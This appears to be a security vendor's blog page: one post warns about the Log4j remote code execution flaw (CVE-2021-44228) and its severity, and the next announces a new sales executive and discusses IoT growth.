On December 10, 2021, details emerged about a critical remote code execution vulnerability in Apache Log4j, assigned as CVE-2021-44228, in which remote users who can cause specifically crafted strings to be processed by an application’s Log4j logging layer. It takes advantage of Log4j not checking against LDAP and JNDI (Java Naming and Directory Interface) requests and may be able to execute code, and thereby take control of the server or local machine hosting the affected application.
The official security advisory from Apache can be found here: https://logging.apache.org/log4j/2.x/security.html
But it is important to understand just how severe this is. As our CTO mentioned on the day it was announced, Heartbleed (https://www.cve.org/CVERecord?id=CVE-2014-0160) which was an OpenSSL vulnerability affecting a large proportion of Web traffic, was categorised as a 7.5.
Log4J is categorised as a 10. A perfect 10.
The fact that this can affect everything from Minecraft (popular MMO game) to Microsoft & Amazon to Apple gives you a sense of the scale of the potential impact. The CISA, (Cybersecurity and Infrastructure Security Agency, a Department of Homeland Security) says that Log4J will affect hundreds of millions of devices and that “no single action will fix the issueā€¯
Basically, if you or your software/service create a log for anything you should check your status. It potentially effects everyone, and I mean everyone!!
At Device Authority we acted swiftly to remediate the impact of Log4J and have published the following article:
If you have any questions or doubts about KeyScaler and Log4J then reach out today so that we can understand your concerns.
Act now, stay safe!!
I am incredibly excited to announce that I have joined the Device Authority team this week as a VP Sales and Business Development for North America. Having been involved for many years now within the IoT industry, I understand the significance of cybersecurity gaps and challenges surrounding devices deployed for critical infrastructure which directly affects everyone. Whether it be the energy we rely on, the water we drink, the food we eat or the manufacturing facilities that create the solutions we consume in our everyday lives.
The IoT is expanding at a rapid rate and is expected to grow over the coming years at a pace which makes previous technology adoptions look insignificant. Predictions are that by 2020 there will be some +20 Billion connected devices worldwide. The IoT promises to connect everything from CCTV cameras, medical devices, smart home products to smart enabled vehicles and many more devices.
